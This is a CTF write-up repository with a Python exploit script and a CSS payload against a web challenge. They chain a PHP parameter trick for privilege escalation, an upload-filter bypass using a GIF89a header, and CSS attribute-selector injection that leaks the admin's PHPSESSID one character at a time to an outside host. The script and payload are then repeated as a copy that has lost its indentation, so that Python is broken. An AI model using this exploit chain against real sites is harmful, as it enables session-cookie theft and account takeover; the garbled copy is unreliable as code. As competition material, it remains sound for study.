stypr/README.md

## README.md

      
    Raw
  

              README.md
            
          
    Quick Summary

First-blooded this challenge.
The server is down, I cannot explain briefly


Comment in the website shows get_perm.php


Another comment in the get_perm.php shows ?remote_debug=1.


Using a php trick, you get a write post privilege.


You have write posts, submit posts to admin == definitely XSS


but CSP is there. img-src:*, script-src:nonce(on every refresh), and so on.


On view.php, there is a image tag with src of PHPSESSID.


Challenge description says the PHPSESSID is the flag.


<base> tag is blocked (returns no hack msg)


You can upload files by license param, but it has the extension blacklist and image header checks.


header can be shortened by using GIF89a header (shortest, ASCII, very nice)


html, htm, php, php5 extensions are blocked, css is not


By CSS leak, it is possible to leak each byte of the admin's PHPSESSID.


After the CTF, admin said I first-blooded with the intended solution, nice!

  
## exploit.py
#!/usr/bin/python -u
#-*- coding: utf-8 -*-

import os
import sys
import time
import requests
import hashlib

r = requests.Session()

def calc_pow(val):
    ''' calc PoW '''
    i = 0
    s = ""
    while True:
        s = str(i)
        if hashlib.sha1(s).hexdigest()[-5:] == val:
            return s
        i += 1

def get_perm():
    ''' basically use php trick to escalate privilege '''
    return r.get("http://52.78.192.229/get_perm.php?cred+plain%5B1]=admin").text

def get_form():
    return r.get("http://52.78.192.229/request.php").text

def submit_form(title, content, pow):
    files = {'license': open('exploit.css','rb')}
    data = {'prod': title, 'purpose': content, 'pow': pow}
    return r.post("http://52.78.192.229/request.php", files=files, data=data).text

def view_form(rid):
    return r.get("http://52.78.192.229/view.php?rid=%s" % (rid,)).text

def send_form(rid):
    t = r.post("http://52.78.192.229/view.php?rid=%s" % (rid,), {'rid': rid}).text
    return t


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python exploit.py [flag]")
        exit(-1)

    ''' track.php contains session '''
    search_val = "/track.php?id=" + sys.argv[1]

    ''' write_exploit '''
    css_payload = open("payload.css", "rb").read()
    css_payload = css_payload.replace("{{prev}}", search_val)
    exploit = open("exploit.css", "wb")
    exploit.write(css_payload)
    exploit.close()

    ''' trigger bug to get the privilege '''
    get_perm()

    ''' upload exploit first, get the filename of css '''
    resp_form = get_form()
    resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
    proof_hash = calc_pow(resp_form_pow)
    resp_submit = submit_form("OK", "good~", proof_hash)
    resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
    resp_view = view_form(resp_submit_url)
    css_filename = resp_view.split('license" src="')[1].split('"')[0]

    ''' upload with the stylesheet tag with previously uploaded css file '''
    resp_form = get_form()
    resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
    proof_hash = calc_pow(resp_form_pow)
    resp_submit = submit_form('<link rel=stylesheet href=%s>' % (css_filename,), 'dummy content', proof_hash)
    resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
    resp_view = view_form(resp_submit_url)
    css_filename = resp_view.split('license" src="')[1].split('"')[0]

    ''' let admin see it '''
    print(view_form(resp_submit_url))
    print(send_form(resp_submit_url))

    '''
    Use socat to listen, or use http server to wait for flag
    $ python exploit.py "t"
    ...
    $ python exploit.py "th1s1sv3rys3cr3tm4g1c0fc55"
    '''

## payload.css
GIF89a{} img[src^='{{prev}}a'] { background: url('http://harold.kim:1234/leak/a'); }
img[src^='{{prev}}b'] { background: url('http://harold.kim:1234/leak/b'); }
img[src^='{{prev}}c'] { background: url('http://harold.kim:1234/leak/c'); }
img[src^='{{prev}}d'] { background: url('http://harold.kim:1234/leak/d'); }
img[src^='{{prev}}e'] { background: url('http://harold.kim:1234/leak/e'); }
img[src^='{{prev}}f'] { background: url('http://harold.kim:1234/leak/f'); }
img[src^='{{prev}}g'] { background: url('http://harold.kim:1234/leak/g'); }
img[src^='{{prev}}h'] { background: url('http://harold.kim:1234/leak/h'); }
img[src^='{{prev}}i'] { background: url('http://harold.kim:1234/leak/i'); }
img[src^='{{prev}}j'] { background: url('http://harold.kim:1234/leak/j'); }
img[src^='{{prev}}k'] { background: url('http://harold.kim:1234/leak/k'); }
img[src^='{{prev}}l'] { background: url('http://harold.kim:1234/leak/l'); }
img[src^='{{prev}}m'] { background: url('http://harold.kim:1234/leak/m'); }
img[src^='{{prev}}n'] { background: url('http://harold.kim:1234/leak/n'); }
img[src^='{{prev}}o'] { background: url('http://harold.kim:1234/leak/o'); }
img[src^='{{prev}}p'] { background: url('http://harold.kim:1234/leak/p'); }
img[src^='{{prev}}q'] { background: url('http://harold.kim:1234/leak/q'); }
img[src^='{{prev}}r'] { background: url('http://harold.kim:1234/leak/r'); }
img[src^='{{prev}}s'] { background: url('http://harold.kim:1234/leak/s'); }
img[src^='{{prev}}t'] { background: url('http://harold.kim:1234/leak/t'); }
img[src^='{{prev}}u'] { background: url('http://harold.kim:1234/leak/u'); }
img[src^='{{prev}}v'] { background: url('http://harold.kim:1234/leak/v'); }
img[src^='{{prev}}w'] { background: url('http://harold.kim:1234/leak/w'); }
img[src^='{{prev}}x'] { background: url('http://harold.kim:1234/leak/x'); }
img[src^='{{prev}}y'] { background: url('http://harold.kim:1234/leak/y'); }
img[src^='{{prev}}z'] { background: url('http://harold.kim:1234/leak/z'); }
img[src^='{{prev}}1'] { background: url('http://harold.kim:1234/leak/1'); }
img[src^='{{prev}}2'] { background: url('http://harold.kim:1234/leak/2'); }
img[src^='{{prev}}3'] { background: url('http://harold.kim:1234/leak/3'); }
img[src^='{{prev}}4'] { background: url('http://harold.kim:1234/leak/4'); }
img[src^='{{prev}}5'] { background: url('http://harold.kim:1234/leak/5'); }
img[src^='{{prev}}6'] { background: url('http://harold.kim:1234/leak/6'); }
img[src^='{{prev}}7'] { background: url('http://harold.kim:1234/leak/7'); }
img[src^='{{prev}}8'] { background: url('http://harold.kim:1234/leak/8'); }
img[src^='{{prev}}9'] { background: url('http://harold.kim:1234/leak/9'); }
img[src^='{{prev}}0'] { background: url('http://harold.kim:1234/leak/0'); }
	#!/usr/bin/python -u
	#-- coding: utf-8 --

	import os
	import sys
	import time
	import requests
	import hashlib

	r = requests.Session()

	def calc_pow(val):
	''' calc PoW '''
	i = 0
	s = ""
	while True:
	s = str(i)
	if hashlib.sha1(s).hexdigest()[-5:] == val:
	return s
	i += 1

	def get_perm():
	''' basically use php trick to escalate privilege '''
	return r.get("http://52.78.192.229/get_perm.php?cred+plain%5B1]=admin").text

	def get_form():
	return r.get("http://52.78.192.229/request.php").text

	def submit_form(title, content, pow):
	files = {'license': open('exploit.css','rb')}
	data = {'prod': title, 'purpose': content, 'pow': pow}
	return r.post("http://52.78.192.229/request.php", files=files, data=data).text

	def view_form(rid):
	return r.get("http://52.78.192.229/view.php?rid=%s" % (rid,)).text

	def send_form(rid):
	t = r.post("http://52.78.192.229/view.php?rid=%s" % (rid,), {'rid': rid}).text
	return t


	if __name__ == "__main__":
	if len(sys.argv) != 2:
	print("Usage: python exploit.py [flag]")
	exit(-1)

	''' track.php contains session '''
	search_val = "/track.php?id=" + sys.argv[1]

	''' write_exploit '''
	css_payload = open("payload.css", "rb").read()
	css_payload = css_payload.replace("{{prev}}", search_val)
	exploit = open("exploit.css", "wb")
	exploit.write(css_payload)
	exploit.close()

	''' trigger bug to get the privilege '''
	get_perm()

	''' upload exploit first, get the filename of css '''
	resp_form = get_form()
	resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
	proof_hash = calc_pow(resp_form_pow)
	resp_submit = submit_form("OK", "good~", proof_hash)
	resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
	resp_view = view_form(resp_submit_url)
	css_filename = resp_view.split('license" src="')[1].split('"')[0]

	''' upload with the stylesheet tag with previously uploaded css file '''
	resp_form = get_form()
	resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
	proof_hash = calc_pow(resp_form_pow)
	resp_submit = submit_form('<link rel=stylesheet href=%s>' % (css_filename,), 'dummy content', proof_hash)
	resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
	resp_view = view_form(resp_submit_url)
	css_filename = resp_view.split('license" src="')[1].split('"')[0]

	''' let admin see it '''
	print(view_form(resp_submit_url))
	print(send_form(resp_submit_url))

	'''
	Use socat to listen, or use http server to wait for flag
	$ python exploit.py "t"
	...
	$ python exploit.py "th1s1sv3rys3cr3tm4g1c0fc55"
	'''
	GIF89a{} img[src^='{{prev}}a'] { background: url('http://harold.kim:1234/leak/a'); }
	img[src^='{{prev}}b'] { background: url('http://harold.kim:1234/leak/b'); }
	img[src^='{{prev}}c'] { background: url('http://harold.kim:1234/leak/c'); }
	img[src^='{{prev}}d'] { background: url('http://harold.kim:1234/leak/d'); }
	img[src^='{{prev}}e'] { background: url('http://harold.kim:1234/leak/e'); }
	img[src^='{{prev}}f'] { background: url('http://harold.kim:1234/leak/f'); }
	img[src^='{{prev}}g'] { background: url('http://harold.kim:1234/leak/g'); }
	img[src^='{{prev}}h'] { background: url('http://harold.kim:1234/leak/h'); }
	img[src^='{{prev}}i'] { background: url('http://harold.kim:1234/leak/i'); }
	img[src^='{{prev}}j'] { background: url('http://harold.kim:1234/leak/j'); }
	img[src^='{{prev}}k'] { background: url('http://harold.kim:1234/leak/k'); }
	img[src^='{{prev}}l'] { background: url('http://harold.kim:1234/leak/l'); }
	img[src^='{{prev}}m'] { background: url('http://harold.kim:1234/leak/m'); }
	img[src^='{{prev}}n'] { background: url('http://harold.kim:1234/leak/n'); }
	img[src^='{{prev}}o'] { background: url('http://harold.kim:1234/leak/o'); }
	img[src^='{{prev}}p'] { background: url('http://harold.kim:1234/leak/p'); }
	img[src^='{{prev}}q'] { background: url('http://harold.kim:1234/leak/q'); }
	img[src^='{{prev}}r'] { background: url('http://harold.kim:1234/leak/r'); }
	img[src^='{{prev}}s'] { background: url('http://harold.kim:1234/leak/s'); }
	img[src^='{{prev}}t'] { background: url('http://harold.kim:1234/leak/t'); }
	img[src^='{{prev}}u'] { background: url('http://harold.kim:1234/leak/u'); }
	img[src^='{{prev}}v'] { background: url('http://harold.kim:1234/leak/v'); }
	img[src^='{{prev}}w'] { background: url('http://harold.kim:1234/leak/w'); }
	img[src^='{{prev}}x'] { background: url('http://harold.kim:1234/leak/x'); }
	img[src^='{{prev}}y'] { background: url('http://harold.kim:1234/leak/y'); }
	img[src^='{{prev}}z'] { background: url('http://harold.kim:1234/leak/z'); }
	img[src^='{{prev}}1'] { background: url('http://harold.kim:1234/leak/1'); }
	img[src^='{{prev}}2'] { background: url('http://harold.kim:1234/leak/2'); }
	img[src^='{{prev}}3'] { background: url('http://harold.kim:1234/leak/3'); }
	img[src^='{{prev}}4'] { background: url('http://harold.kim:1234/leak/4'); }
	img[src^='{{prev}}5'] { background: url('http://harold.kim:1234/leak/5'); }
	img[src^='{{prev}}6'] { background: url('http://harold.kim:1234/leak/6'); }
	img[src^='{{prev}}7'] { background: url('http://harold.kim:1234/leak/7'); }
	img[src^='{{prev}}8'] { background: url('http://harold.kim:1234/leak/8'); }
	img[src^='{{prev}}9'] { background: url('http://harold.kim:1234/leak/9'); }
	img[src^='{{prev}}0'] { background: url('http://harold.kim:1234/leak/0'); }